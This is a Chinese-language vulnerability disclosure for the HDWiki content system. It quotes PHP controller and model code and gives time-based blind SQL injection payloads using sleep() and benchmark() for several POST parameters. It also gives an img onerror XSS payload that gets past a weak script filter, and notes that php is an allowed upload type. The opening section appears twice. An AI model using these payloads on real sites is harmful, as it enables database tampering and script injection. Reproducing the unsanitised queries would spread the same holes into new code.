### 简要描述: HDWiki 在经过前面的大牛洗礼之后,变得越来越安全了,小菜我也只能找到几个盲注和xss而已 PS:求别忽略 PSS:漏洞是自己的,rank是剑心的,所以.....你懂得 ~。~ ### 详细说明: 在经过前面的大牛洗礼之后,变得越来越安全了,get被不分青红皂白的过滤掉一堆关键字,get注入几乎是不大可能的了,所以我只找了post 1 ``` control/user.php 177 function doaegis(){ 178 $id=$this->post['id']; //vulnerable 179 if(empty($id)){ 180 $this->message(-1,'',2); 181 } 182 if($_ENV["comment"]->is_in_cookie('aegis',$id)){ 183 $this->message(-2,'',2); 184 } 185 $_ENV["comment"]->update_field('aegis',1,$id,0); 186 $this->message($id,'',2); 187 } model/comment.class.php 56 function update_field($field,$value,$id,$type=1){ 57 if($type){ 58 $sql="UPDATE ".DB_TABLEPRE."comment SET $field='$value' WHERE id= $id "; 59 }else{ 60 $sql="UPDATE ".DB_TABLEPRE."comment SET $field=$field+$value WHERE id= $id "; 61 } 62 $this->db->query($sql); 63 } ``` 提交id=1 and if(substr((select 1),1,1)=1,sleep(10),1) 实现盲注 2 ``` 189 function dooppose(){ 190 $id=$this->post['id']; //vulnerable 191 if(empty($id)){ 192 $this->message(-1,'',2); 193 } 194...
### 简要描述: HDWiki 在经过前面的大牛洗礼之后,变得越来越安全了,小菜我也只能找到几个盲注和xss而已 PS:求别忽略 PSS:漏洞是自己的,rank是剑心的,所以.....你懂得 ~。~ ### 详细说明: 在经过前面的大牛洗礼之后,变得越来越安全了,get被不分青红皂白的过滤掉一堆关键字,get注入几乎是不大可能的了,所以我只找了post 1 ``` control/user.php 177 function doaegis(){ 178 $id=$this->post['id']; //vulnerable 179 if(empty($id)){ 180 $this->message(-1,'',2); 181 } 182 if($_ENV["comment"]->is_in_cookie('aegis',$id)){ 183 $this->message(-2,'',2); 184 } 185 $_ENV["comment"]->update_field('aegis',1,$id,0); 186 $this->message($id,'',2); 187 } model/comment.class.php 56 function update_field($field,$value,$id,$type=1){ 57 if($type){ 58 $sql="UPDATE ".DB_TABLEPRE."comment SET $field='$value' WHERE id= $id "; 59 }else{ 60 $sql="UPDATE ".DB_TABLEPRE."comment SET $field=$field+$value WHERE id= $id "; 61 } 62 $this->db->query($sql); 63 } ``` 提交id=1 and if(substr((select 1),1,1)=1,sleep(10),1) 实现盲注 2 ``` 189 function dooppose(){ 190 $id=$this->post['id']; //vulnerable 191 if(empty($id)){ 192 $this->message(-1,'',2); 193 } 194 if($_ENV["comment"]->is_in_cookie('oppose',$id)){ 195 $this->message(-2,'',2); 196 } 197 $_ENV["comment"]->update_field('oppose',1,$id,0); 198 $this->message($id,'',2); 199 } ``` 同上 3 ``` control/gift.php 51 function doapply(){ 52 /*获取用户提交参数*/ 53 $gid =$this->post['gid']; //礼品id //vulnerable ….................. 61 62 $gift=$_ENV['gift']->get($gid);//当前礼品 model/gift.class.php 46 function get($id){ 47 return $this->db->fetch_first("SELECT * FROM ".DB_TABLEPRE."gift WHERE id =".$id); 48 } ``` 提交gid=1 and if(substr((select 1),1,1)=1,benchmark(1000000000,md5(534534)),1) 4 ``` control/doc.php 1021 function dodelsave(){ 1022 $aid=isset($this->get[2])?$this->get[2]:''; 1023 if(empty($aid)){ 1024 $aid=$this->post['checkid']; //vulnerable 1025 $num=count($aid); 1026 if($num>0){ 1027 $aids=''; 1028 for($i=0;$i<$num;$i++){ 1029 $aids.=$aid[$i].','; 1030 } 1031 $aids=substr($aids,0,-1); 1032 $_ENV['doc']->del_autosave($aids); model/doc.class.php 88 function del_autosave($aid,$uid='',$did=''){ 89 if($aid != ''){ 90 $sql="DELETE FROM ".DB_TABLEPRE."autosave WHERE aid in ($aid)"; 91 }elseif($uid!='' && $did!=''){ 92 $sql="DELETE FROM ".DB_TABLEPRE."autosave WHERE uid = '$uid' AND did = '$did'"; 93 }else{ 94 return false; 95 } 96 return $this->db->query($sql); 97 } ``` checkid[]=1) or if(substr((select 1),1,1)=1,benchmark(1000000000,md5(534534)),1 5 ``` control/user.php 166 function doremove(){ 167 $messageids = ''; 168 if($this->get[2]=='single'){ 169 $alltype = array(1,2,3); 170 if(is_numeric($this->post['id']) && in_array($this->post['type'], $alltype)){ 171 $_ENV['pms']->update_pms($this->post['id'],$this->post['type']); 172 } 173 }else{ 174 $removeid = $this->post['checkid']; //vulnerable 175 $num = count($removeid); 176 $allowlist = array('inbox', 'outbox', 'drafts'); 177 if(is_array($removeid) && $num>=1 && in_array($this->get[3], $allowlist)){ 178 switch ($this->get[3]){ 179 case inbox: 180 $type = 1; 181 break; 182 case outbox: 183 $type = 2; 184 break; 185 case drafts: 186 $type = 3; 187 break; 188 } 189 for($i=0; $i<$num; $i++){ 190 $messageids .= $removeid[$i].','; 191 } 192 $messageids = substr($messageids, 0, -1); 193 $result = $_ENV['pms']->update_pms($messageids, $type); model/pms.class.php 127 function update_pms($messageids,$type){ 128 $id = strpos($messageids , ',') ? substr($messageids, 0, strpos($messageids, ',')) : $messageids; 129 $pms = $this->get_pms($id); 130 if($pms['delstatus'] == $type || $type == 3){ 131 $result=$this->remove($messageids); 132 }else{ 133 $type = ($type == 2) ? 1 : 2; 134 $result=$this->db->query("UPDATE ".DB_TABLEPRE."pms SET delstatus='$type' WHERE id in ($messageids)"); 135 } 136 return $result; 137 } 139 function remove($messageids){ 140 return($this->db->query("DELETE FROM ".DB_TABLEPRE."pms WHERE id in ($messageids)")); 141 } ``` 同上 XSS 编辑词条 正文过滤不严 源代码编辑 插入 <img onerror="alert(/yy520/)" src="yy520.jpg" /> index.php?doc-view-51 ``` $doc['content'] = string::stripscript($_ENV['doc']->replace_danger_word($this->post['content'])); 227 function stripscript($string){ 228 $pregfind=array("/<script.*>.*<\/script>/siU",'/on(mousewheel|mouseover|click|load|onload|submit|focus|blur)="[^"]*"/i'); 229 $pregreplace=array('','',); 230 $string=preg_replace($pregfind,$pregreplace,$string); 231 return $string; 232 } ``` 正文内容去敏感词 再去关键危险标签 可惜过滤不严 上传的一点小问题 ./install/install.php:578:('attachment_type', 'jpg|jpeg|bmp|gif|png|gz|bz2|zip|rar|doc|ppt|mp3|xls|txt|swf|flv|php|pdf'), 安装的时候把 php 也加到了可上传文件格式中,默认没开始上传附件,危害也不算大,就是看起来有点不顺眼而已 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201209/111114522938feaf03463cd35e38c2ffb9cca309.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/111114522938feaf03463cd35e38c2ffb9cca309.png)